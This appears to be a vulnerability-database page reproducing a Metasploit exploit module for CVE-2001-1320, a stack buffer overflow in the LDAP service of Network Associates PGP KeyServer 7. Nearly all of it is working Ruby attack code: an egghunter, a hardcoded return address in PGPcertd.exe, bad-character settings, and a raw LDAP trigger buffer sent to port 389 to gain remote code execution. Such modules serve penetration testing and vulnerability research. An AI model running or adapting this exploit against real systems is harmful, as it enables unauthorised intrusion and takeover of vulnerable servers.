Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrickPACKETSTORM:95519
HistoryNov 05, 2010 - 12:00 a.m.

Network Associates PGP KeyServer 7 LDAP Buffer Overflow

2010-11-0500:00:00
patrick
packetstormsecurity.com
27

0.437 Medium

EPSS

Percentile

97.4%

JSON
`##  
# $Id: pgp_keyserver7.rb 10908 2010-11-04 23:50:35Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the LDAP service that is  
part of the NAI PGP Enterprise product suite. This module was tested  
against PGP KeyServer v7.0. Due to space restrictions, egghunter is  
used to find our payload - therefore you may wish to adjust WfsDelay.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 10908 $',  
'References' =>  
[  
[ 'CVE', '2001-1320' ],  
[ 'OSVDB', '4742' ],  
[ 'BID', '3046' ],  
[ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],  
],  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 450,  
'BadChars' => "\x00\x0a\x0d\x20",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp  
],  
'DisclosureDate' => 'Jul 16 2001',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(389)  
], self.class)  
end  
  
def exploit  
connect  
  
# - Maximum payload space is 102 so we use EggHunter instead.  
# - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.  
  
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })  
egg = hunter[1]  
  
eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff  
eggend = "\x80\x00"  
  
print_status("Sending trigger and hunter first...")  
  
buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff  
buf << [target['Ret']].pack('V') + hunter[0]  
buf << "\x00"  
  
sock.put(buf)  
  
disconnect  
  
connect  
  
print_status("Sending hunted payload...")  
sock.put(eggstart+egg+eggend)  
  
handler  
disconnect  
end  
  
end  
`

Related

nvd 1
cve 1
cvelist 1
cert 1
nvd
nvd
CVE-2001-1320
2001-07-16 04:00:00
cve
cve
CVE-2001-1320
2002-05-03 04:00:00
cvelist
cvelist
CVE-2001-1320
2002-05-03 04:00:00
cert
cert
Network Associates PGP Keyserver contains multiple vulnerabilities in LDAP handling code
2001-07-17 00:00:00

0.437 Medium

EPSS

Percentile

97.4%

JSON
Related for PACKETSTORM:95519
nvd1cve1cvelist1cert1